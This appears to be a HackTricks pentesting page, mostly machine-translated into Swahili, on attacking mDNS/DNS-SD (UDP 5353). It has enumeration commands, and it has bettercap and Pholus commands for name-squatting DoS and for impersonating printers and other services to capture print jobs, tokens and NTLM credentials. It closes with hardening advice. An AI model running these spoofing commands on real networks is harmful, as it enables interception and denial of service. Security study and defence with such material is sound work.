HackTricks5353/UDP Multicast DNS (mDNS) na DNS-SD
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
Multicast DNS (mDNS) inaruhusu ufumbuzi wa majina kama DNS na ugunduzi wa huduma ndani ya kiungo cha ndani bila seva ya unicast DNS. Inatumia UDP/5353 na anwani za multicast 224.0.0.251 (IPv4) na FF02::FB (IPv6). Ugunduzi wa Huduma za DNS (DNS-SD, kwa kawaida hutumika na mDNS) unatoa njia iliyoandikwa ili kuorodhesha na kuelezea huduma kupitia rekodi za PTR, SRV na TXT.
PORT STATE SERVICE
5353/udp open zeroconf
Key protocol details you’ll often leverage during attacks:
- Majina katika eneo la .local yanatatuliwa kupitia mDNS.
- QU (Query Unicast) bit inaweza kuomba majibu ya unicast hata kwa maswali ya multicast.
- Utekelezaji unapaswa kupuuza pakiti zisizo na chanzo kutoka kwenye kiungo cha ndani; baadhi ya stacks bado zinakubali hizo.
- Kuchunguza/kutangaza kunalazimisha majina ya kipekee ya mwenyeji/huduma; kuingilia hapa kunaweza kuunda hali za DoS/“name squatting”.
DNS-SD service model
Huduma zinatambulishwa kama _
Network Exploration and Enumeration
- nmap target scan (direct mDNS on a host):
nmap -sU -p 5353 --script=dns-service-discovery <target>
- nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
sudo nmap --script=broadcast-dns-service-discovery
- avahi-browse (Linux):
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
- Apple dns-sd (macOS):
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
- Packet capture with tshark:
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
Tip: Baadhi ya vivinjari/WebRTC hutumia majina ya mDNS ya muda mfupi kuficha IP za ndani. Ikiwa unaona wagombea random-UUID.local kwenye waya, watatue kwa mDNS ili kuhamasisha IP za ndani.
Attacks
mDNS name probing interference (DoS / name squatting)
Wakati wa awamu ya kuchunguza, mwenyeji anachunguza upekee wa jina. Kujibu kwa migongano ya kudanganya kunalazimisha kuchagua majina mapya au kushindwa. Hii inaweza kuchelewesha au kuzuia usajili wa huduma na ugunduzi.
Example with Pholus:
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
Huduma za kudanganya na kujifanya (MitM)
Jifanya kama huduma za DNS-SD zinazotangazwa (printa, AirPlay, HTTP, kushiriki faili) ili kuwashawishi wateja kuungana na wewe. Hii ni muhimu hasa kwa:
- Kukamata hati kwa kudanganya _ipp._tcp au _printer._tcp.
- Kuwavutia wateja kwenye huduma za HTTP/HTTPS ili kukusanya tokens/cookies au kupeleka payloads.
- Kuunganisha na mbinu za NTLM relay wakati wateja wa Windows wanaposhughulikia uthibitisho kwa huduma zilizodanganywa.
Kwa moduli ya zerogod ya bettercap (mDNS/DNS-SD spoofer/impersonator):
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
Pia angalia LLMNR/NBNS/mDNS/WPAD spoofing na workflows za kukamata/kuhamasisha akidi:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
Maelezo kuhusu masuala ya utekelezaji wa hivi karibuni (yenye manufaa kwa DoS/kuendelea wakati wa ushirikiano)
- Avahi reachable-assertion na D-Bus crash bugs (2023) zinaweza kumaliza avahi-daemon kwenye usambazaji wa Linux (mfano CVE-2023-38469..38473, CVE-2023-1981), kuharibu ugunduzi wa huduma kwenye mwenyeji wa lengo hadi upya.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (2024, CVE-2024-20303) inaruhusu washambuliaji wa karibu kuendesha CPU kubwa na kuondoa APs. Ikiwa unakutana na mDNS gateway kati ya VLANs, kuwa makini na utulivu wake chini ya mDNS isiyo sahihi au ya kiwango cha juu.
Maoni ya kujihami na OPSEC
- Mipaka ya segmenti: Usiruhusu 224.0.0.251/FF02::FB kati ya maeneo ya usalama isipokuwa mDNS gateway inahitajika wazi. Ikiwa lazima uunganishe ugunduzi, pendelea orodha za ruhusa na mipaka ya kiwango.
- Windows endpoints/servers:
- Ili kuzima kabisa ufafanuzi wa majina kupitia mDNS weka thamani ya rejista na upya:
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
- Katika mazingira yanayosimamiwa, zima sheria ya Windows Defender Firewall ya “mDNS (UDP-In)” (angalau kwenye profaili ya Domain) ili kuzuia usindikaji wa mDNS wa ndani huku ukihifadhi kazi za nyumbani/kuhamahama.
- Kwenye toleo jipya la Windows 11/GPO templates, tumia sera “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” na uweke kuwa Disabled.
- Linux (Avahi):
- Funga kuchapisha wakati sio muhimu: weka
disable-publishing=yes, na punguza interfaces kwaallow-interfaces=/deny-interfaces=katika/etc/avahi/avahi-daemon.conf. - Fikiria
check-response-ttl=yesna epukaenable-reflector=yesisipokuwa inahitajika kwa dharura; pendeleareflect-filters=orodha za ruhusa unaporeflect. - macOS: Punguza mDNS ya ndani kwenye moto wa mwenyeji/mtandao wakati ugunduzi wa Bonjour hauhitajiki kwa subnet maalum.
- Ufuatiliaji: Onya juu ya ongezeko la kawaida katika maswali ya
_services._dns-sd._udp.localau mabadiliko ya ghafla katika SRV/TXT za huduma muhimu; hizi ni dalili za spoofing au uigaji wa huduma.
Kumbukumbu ya haraka ya zana
- nmap NSE:
dns-service-discoverynabroadcast-dns-service-discovery. - Pholus: skana hai, mzunguko wa nyuma wa mDNS, DoS na wasaidizi wa spoofing.
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
- bettercap zerogod: gundua, hifadhi, tangaza, na uigize huduma za mDNS/DNS-SD (angalia mifano hapo juu).
Spoofing/MitM
Shambulio la kuvutia zaidi unaloweza kufanya juu ya huduma hii ni kufanya MitM katika mawasiliano kati ya mteja na seva halisi. Unaweza kuwa na uwezo wa kupata faili nyeti (MitM mawasiliano na printer) au hata akidi (uthibitisho wa Windows).
Kwa maelezo zaidi angalia:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
Marejeleo
- Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things
- Nmap NSE: broadcast-dns-service-discovery
- bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.